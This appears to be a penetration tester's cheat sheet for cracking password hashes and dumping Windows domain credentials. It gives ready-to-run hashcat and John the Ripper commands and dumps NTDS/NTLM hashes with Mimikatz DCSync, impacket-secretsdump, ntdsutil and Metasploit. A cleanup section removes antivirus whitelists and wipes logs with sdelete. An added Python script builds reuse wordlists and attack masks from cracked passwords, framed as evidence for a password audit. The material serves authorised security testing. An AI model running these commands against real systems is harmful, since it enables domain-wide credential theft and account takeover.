
Password Cracking

Hash identifier

hash-identifier

CEWL

cewl <domain> -m 6 -w <out>

JtR

john --format=md5crypt unshadowed
auxiliary/analyze/jtr_crack_fast

Kerberoasting

john <krb.txt> --wordlist=</usr/share/wordlists/rockyou.txt>

Hashcat and Hashes

Hashcat SHA512 $6$ shadow file

hashcat -m 1800 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 $1$ shadow file

hashcat -m 500 -a 0 hash.txt rockyou.txt --username

Hashcat MD5 Apache webdav file

hashcat -m 1600 -a 0 hash.txt rockyou.txt

Hashcat SHA1

hashcat -m 100 -a 0 hash.txt rockyou.txt

Hashcat Wordpress

hashcat -m 400 -a 0 hash.txt rockyou.txt

Hashcat Kerberoasting

hashcat -m 13100 -a 0 hash.txt rockyou.txt

Crack SSH private key

A key file containing the header line "Proc-Type: 4,ENCRYPTED" is passphrase-protected and can be converted for john:
/opt/ssh2john.py id_rsa > id_john
john id_john --wordlist=</usr/share/wordlists/rockyou.txt>

Dump NTLM passwords

use windows/gather/credentials/domain_hashdump

Alternative methods

use auxiliary/admin/smb/psexec_ntdsgrab
Hashdump / smarthashdump (unsafe for big AD)

Mimikatz Module:
lsadump::lsa /inject [/name:krbtgt] (unsafe)

Impacket

impacket-secretsdump <fqdn_domain>/<da_account>:'<password>'@<DC_ip> -just-dc

Ntdsutil (needs a copy of SAM and SYSTEM too; the IFM export writes the registry hives next to ntds.dit)

ntdsutil
activate instance ntds
ifm
create full C:\ntdsutil
quit
quit

Dump

./adXtract.sh /root/ntds.dit /root/SYSTEM <projectname>

NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive

Parsing

From Cobalt Strike export

cat credentials.txt | grep ":::" | grep -i <fqdn_domain> | awk -F "\\" '{print $2}' | sed 's/:::/:/' | sed 's/::://' > <fqdn_domain>.hashes

From impacket-secretdump

grep '.*:.*:.*:.*:::' <impacket.hashes> | cut -d ':' -f1,4 | grep -v '\$' > <domain.hashes>

From Metasploit

db_export -f pwdump <mission.pwdump>
grep '.*:.*:.*:.*:::' mission.pwdump > mission.hashes

From ntds.dit + SYSTEM

secretsdump.py -ntds <ntds.dit> -system <SYSTEM> LOCAL | grep '.*:.*:.*:.*:::' | cut -d ":" -f 1,4 > /tmp/ntds.hash
git clone https://github.com/HarmJ0y/ImpDump /opt/Impdump
cd /opt/Impdump
chmod +x setup.sh
./setup.sh

/opt/Impdump/extract.sh <NTDS.dit> > /tmp/ntds.raw
/opt/Impdump/impdump.py <SYSTEM> /tmp/ntds.raw | cut -d ":" -f 1,4 > /tmp/ntds.hash

DCSync extraction method

Prerequisites

  • Domain Account with Replicating Directory Changes and Replicating Directory Changes All permissions. By default, this is limited to the Domain Admins, Enterprise Admins, Administrators, and Domain Controllers groups.
  • Be logged on with this account on any domain-joined system (server or workstation); it is not necessary to be on the domain controller itself.
  • Access to PowerShell on the system.
  • Download the latest mimikatz release.
  • Extract the archive and whitelist the binaries in the Antivirus/Applocker if necessary.
  • Download Secure Delete from sysinternals.

Extraction

Check the architecture (to pick the x32 or x64 mimikatz binary) by running the following command and reading the "System Type" line.

C:\>systeminfo | findstr "System"
System Boot Time: 01-01-1970, 00:00:00
System Manufacturer: Some manufacturer
System Model: Some model
System Type: x64-based PC
System Directory: C:\WINDOWS\system32
System Locale: fr-be;French (Belgium)

In the mimikatz prompt, type the following commands (one by one):

log C:\mimikatz.log
lsadump::dcsync /all /csv
exit

All remaining lines should have the format "userID username ntlmhash". Save and close the log file.

Parsing

Parse the hashes into hashcat's username:hash syntax and store them in C:\ntlm.hash.

# Collapse the tab-separated columns to ':' and keep columns 1..2 (username, NT hash); PowerShell ranges use '..', not ':'
Get-Content C:\mimikatz.log | ForEach-Object { $_ -replace "\s+",":" } | ForEach-Object { $_.split(":")[1..2] -join ":" } | Out-File C:\ntlm.hash

Cleanup

  • Remove mimikatz (Downloaded archive, x32 and x64 folder, and all other files).
  • Remove the eventual Antivirus/Applocker whitelist.
  • Securely remove C:\mimikatz.log with sdelete.
  • Securely remove C:\ntlm.hash with sdelete.

Password cracking NTLM (domain)

Without a CrackStation

hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\d3*
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\realuniq.lst -r rules\best64.rule
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\small\* -r rules\*
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?a?a?a?a?a?a -i
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out -1 ?l?d -2 ?d?s ?u?l?l?l?l?1?1?2?2
hashcat64.exe -a 3 -m 1000 --potfile-path results\out.pot --username hashes\domain.out ?d?d?d?d?d?d?d?d?d?d?d?d -i
hashcat64.exe -a 0 -m 1000 --potfile-path results\out.pot --username hashes\domain.out dict\rockyou.txt -r rules\efensive.rule

Common masks

hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?d?d?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?l?d?d
hashcat64.exe -a 3 -m 1000 --potfile-path results\<out.pot> --username hashes\<domain.out> ?u?l?l?l?l?l?d?s

Custom dictionary

  1. Reuse cracked passwords.
  2. Establish patterns to perform mask attacks.
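Both steps carried out on hashcat potfile output, as an added Python example that is not part of the original cheat sheet: the cracked plains (plus their base words with trailing digits and symbols stripped) become a reuse wordlist, and each plain is mapped to the ?u?l?d?s mask it follows so the dominant patterns can be ranked for a password-policy report or for -a 3. Plains containing special characters are written by hashcat as $HEX[...] and are decoded here. The potfile lines are constructed.

```python
r"""Build a reuse wordlist and ranked hashcat masks from cracked passwords.

Added example, not part of the original cheat sheet. Input is hashcat potfile
format (hash:plain); non-printable or ':'-containing plains appear as
$HEX[<hex>] and are decoded. Sample potfile lines below are constructed.
"""
from collections import Counter
import re

_HEX_PLAIN = re.compile(r"^\$HEX\[([0-9a-fA-F]*)\]$")


def decode_plain(plain):
    """Undo hashcat's $HEX[...] encoding; plain strings pass through."""
    m = _HEX_PLAIN.match(plain)
    if m:
        return bytes.fromhex(m.group(1)).decode("latin-1")
    return plain


def potfile_plains(lines):
    """Extract the plaintexts from potfile lines of the form hash:plain."""
    plains = []
    for line in lines:
        line = line.rstrip("\r\n")
        if ":" not in line:
            continue
        _, plain = line.split(":", 1)  # the hash never contains ':', the plain may
        if plain:
            plains.append(decode_plain(plain))
    return plains


def password_to_mask(pw):
    """Map a password to a hashcat mask (?u ?l ?d ?s per character)."""
    def cls(ch):
        if ch.islower():
            return "?l"
        if ch.isupper():
            return "?u"
        if ch.isdigit():
            return "?d"
        return "?s"  # printable specials; non-ASCII bytes would need ?b
    return "".join(cls(c) for c in pw)


def mask_stats(plains):
    """[(mask, count, percent), ...], most common mask first."""
    counts = Counter(password_to_mask(p) for p in plains)
    total = len(plains)
    return [(m, n, round(100.0 * n / total, 1)) for m, n in counts.most_common()]


def masks_for_coverage(plains, target_fraction):
    """Shortest prefix of the ranked masks covering target_fraction of plains."""
    chosen, covered = [], 0
    for mask, n, _ in mask_stats(plains):
        chosen.append(mask)
        covered += n
        if covered >= target_fraction * len(plains):
            break
    return chosen


def reuse_wordlist(plains):
    """Cracked plains plus their base words, deduplicated, order preserved."""
    seen, words = set(), []
    for pw in plains:
        for cand in (pw, re.sub(r"[^A-Za-z]+$", "", pw)):
            if cand and cand not in seen:
                seen.add(cand)
                words.append(cand)
    return words


# Constructed potfile lines; the hashes are placeholders, not real NT hashes.
SAMPLE_POTFILE = [
    "00000000000000000000000000000001:Summer2023!",
    "00000000000000000000000000000002:Winter2023!",
    "00000000000000000000000000000003:Company01",
    "00000000000000000000000000000004:Company02",
    "00000000000000000000000000000005:$HEX[50407373773a7264]",  # P@ssw:rd
    "00000000000000000000000000000006:password",
]

if __name__ == "__main__":
    plains = potfile_plains(SAMPLE_POTFILE)
    for mask, n, pct in mask_stats(plains):
        print(f"{mask:<28} {n:>3} {pct:>5}%")
    print("masks covering 60%:", masks_for_coverage(plains, 0.6))
    print("reuse wordlist:", reuse_wordlist(plains))
```

The ranked masks are the audit finding: a policy that lets "?u?l?l?l?l?l?d?d?d?d?s" account for a third of cracked accounts is a season-plus-year pattern, which is the kind of evidence that justifies banned-password lists or length requirements rather than more complexity rules.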